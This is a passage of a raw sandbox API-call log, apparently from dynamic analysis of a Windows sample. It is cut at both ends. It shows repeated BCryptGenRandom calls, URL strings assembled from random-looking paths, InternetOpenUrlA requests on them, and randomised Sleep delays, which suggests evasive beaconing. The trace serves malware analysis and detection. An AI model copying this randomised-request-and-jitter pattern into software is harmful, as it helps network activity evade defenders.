cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.469] GetProcessHeap () returned 0x440000 [0275.469] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0275.469] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0275.469] lstrcatA (in: lpString1="\x04", lpString2="/a3mp898qzTy5y9peosw54dDgG8eieHh8hoct79/knV8jlkrx1jmvcut9yvO/i7qoq2jbhrjy5ljv8DsfmEi6cnk3qo5sdW7rg99ml7eukq/" | out: lpString1="\x04/a3mp898qzTy5y9peosw54dDgG8eieHh8hoct79/knV8jlkrx1jmvcut9yvO/i7qoq2jbhrjy5ljv8DsfmEi6cnk3qo5sdW7rg99ml7eukq/") returned="\x04/a3mp898qzTy5y9peosw54dDgG8eieHh8hoct79/knV8jlkrx1jmvcut9yvO/i7qoq2jbhrjy5ljv8DsfmEi6cnk3qo5sdW7rg99ml7eukq/" [0275.469] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0275.469] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/a3mp898qzTy5y9peosw54dDgG8eieHh8hoct79/knV8jlkrx1jmvcut9yvO/i7qoq2jbhrjy5ljv8DsfmEi6cnk3qo5sdW7rg99ml7eukq/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0275.469] GetProcessHeap () returned 0x440000 [0275.469] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0275.469] GetProcessHeap () returned 0x440000 [0275.469] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0275.469] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0275.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0275.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0275.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0275.470] Sleep (dwMilliseconds=0x14aef) [0275.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0275.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.606] GetProcessHeap () returned 0x440000 [0275.606] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5530 [0275.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5531, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4f5531) returned 0x0 [0275.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.615] GetProcessHeap () returned 0x440000 [0275.615] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0275.615] lstrcpyA (in: lpString1=0x4724e0, lpString2="0UO" | out: lpString1="0UO") returned="0UO" [0275.615] lstrcatA (in: lpString1="0UO", lpString2="/p9nsfLg624gyL7bfzr3D2vdzy/" | out: lpString1="0UO/p9nsfLg624gyL7bfzr3D2vdzy/") returned="0UO/p9nsfLg624gyL7bfzr3D2vdzy/" [0275.616] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0275.616] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="0UO/p9nsfLg624gyL7bfzr3D2vdzy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0275.616] GetProcessHeap () returned 0x440000 [0275.616] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0275.616] GetProcessHeap () returned 0x440000 [0275.616] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5530 | out: hHeap=0x440000) returned 1 [0275.616] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0275.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0275.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0275.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0275.617] Sleep (dwMilliseconds=0x1d10a) [0275.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0275.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.747] GetProcessHeap () returned 0x440000 [0275.747] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01850 [0275.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01851, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a01851) returned 0x0 [0275.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0187c, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a0187c) returned 0x0 [0275.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.903] GetProcAddress 